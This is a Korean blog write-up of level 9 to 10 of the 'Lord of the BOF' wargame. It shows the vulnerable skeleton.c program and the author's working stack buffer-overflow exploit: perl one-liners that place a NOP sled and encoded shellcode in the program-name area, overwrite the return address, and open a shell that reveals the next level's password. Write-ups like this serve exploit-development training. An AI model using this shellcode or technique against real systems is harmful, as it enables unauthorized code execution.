본문 바로가기
워게임/lord of bof

level 9 -> 10

알 수 없는 사용자 2015. 10. 23. 22:16


[vampire@localhost vampire]$ cat skeleton.c 

/*

        The Lord of the BOF : The Fellowship of the BOF

        - skeleton

        - argv hunter

*/


#include <stdio.h>

#include <stdlib.h>


extern char **environ;


main(int argc, char *argv[])

{

char buffer[40];

int i, saved_argc;


if(argc < 2){

printf("argv error\n");

exit(0);

}


// egghunter 

for(i=0; environ[i]; i++)

memset(environ[i], 0, strlen(environ[i]));


if(argv[1][47] != '\xbf')

{

printf("stack is still your friend.\n");

exit(0);

}


// check the length of argument

if(strlen(argv[1]) > 48){

printf("argument is too long!\n");

exit(0);

}


// argc saver

saved_argc = argc;


strcpy(buffer, argv[1]); 

printf("%s\n", buffer);


        // buffer hunter

        memset(buffer, 0, 40);


// ultra argv hunter!

for(i=0; i<saved_argc; i++)

memset(argv[i], 0, strlen(argv[i]));

}


이런 부랄헌터+모든인자 초기화+버퍼 초기화가 되어버렸네요


흠 뭐하지 생각하면서 argv영역 보다가 스택 끝에 보게됬는데 0xbffffff0영역에 프로그램 실행할 때 사용한 명령이 있더라구요 왠진 모르겠는데;


암튼 이걸이용해봅시다 아까 심볼릭링크 안되서 짜증났는데 이번에는 그냥 디렉터리 명도 같이 들어가니까 디렉터리로 생성하고 해볼께여


`perl -e 'print "/home/vampire/test/", "\x90"x100, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81", "/skeleton"'` `perl -e 'print "A"x44, "\x80\xff\xff\xbf"'`


분명 저 위치에 널널하게 nop박혀있고 정상적으로 실행되야 맞는건데 안되네예


`perl -e 'print "\x90"x40, "\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81", "\x90"x40'`


./`perl -e 'print "\x90"x40,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "A"x44,"\xb0\xff\xff\xbf"'` 


[vampire@localhost vampire]$ ./`perl -e 'print "\x90"x40,"\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81"'` `perl -e 'print "A"x44,"\xb0\xff\xff\xbf"'` ` 

?????????????????????????????????????????????


bash$ my-pass 

euid = 510

shellcoder

bash$



'워게임 > lord of bof' 카테고리의 다른 글

level 11 -> 12  (0) 2015.10.23
level 10 -> 11  (0) 2015.10.23
level 8 -> 9  (0) 2015.10.23
level 7 -> 8  (0) 2015.10.23
level 6 -> 7  (0) 2015.10.23

'워게임/lord of bof' Related Articles

티스토리툴바